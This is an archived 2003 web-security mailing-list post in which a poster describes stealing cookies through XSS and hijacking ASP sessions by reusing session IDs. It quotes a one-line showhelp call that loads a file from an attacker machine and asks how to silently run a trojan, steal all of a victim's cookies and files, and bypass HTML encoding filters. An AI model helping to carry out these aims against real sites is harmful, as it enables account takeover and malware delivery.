RE: Proof of Concept Tool on Web Application Security

Hey Everybody,

First of all thank you very much to Robert, Rogan, Steve, Nicolas and Leah for their guidance to test XSS and Session ID brute force attack.

Now I can transfer victim’s cookie to another location successfully. I have tested XSS to transfer cookie using following three ways:

1. Using  document.location
2. Using Image src
3. Using hidden fields

The cookie, which I am getting, is of current application only. Now how can I steal all cookies stored on the victim’s machine? or how to transfer a file from Victim machine?.

Some sites converts < and > tags into &lt; and &gt; to protect them selves from XSS attacks. Is there any way to bypass this protection?

I was testing some trojan execution using XSS. In this process I was able to run help file 31users.chm from attackers machine to victims machine as follows:
window.showhelp(file:///XXX. XXX. XXX. XXX/c:/windows/help/31users.chm) Is it possible to run some trojan or activex componenet instead of help file? Without alerting for any pop-up.
Is this possible to write some malicious help file? (These files not even ask before execution.)

As per IDefence&#x2019;s Article on &#x201c;Brute forcing Session ID&#x201d; some time session ID is random. I have tested this against six sites and I was not much lucky to get session IDs in which only last 3-4 digits are changing. What do you think in practice still are they so? Since iDEFENSE has published this research in Nov 2001 and current scenario might be a bit changed.

In my research of six sites, four sites were using ASP session variable to generated session ID and remaining two their own.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

I was able to hijack ASP sessions using session IDs. In my testing, first I have logged in as user1, got his session ID and using user1&#x2019;s session ID, I was able to hijack user1.

Any help on this would be highly appreciated.

Thanking You.
Sincerely,

Indian Tiger, CISSP Received on Fri Apr 18 10:57:06 2003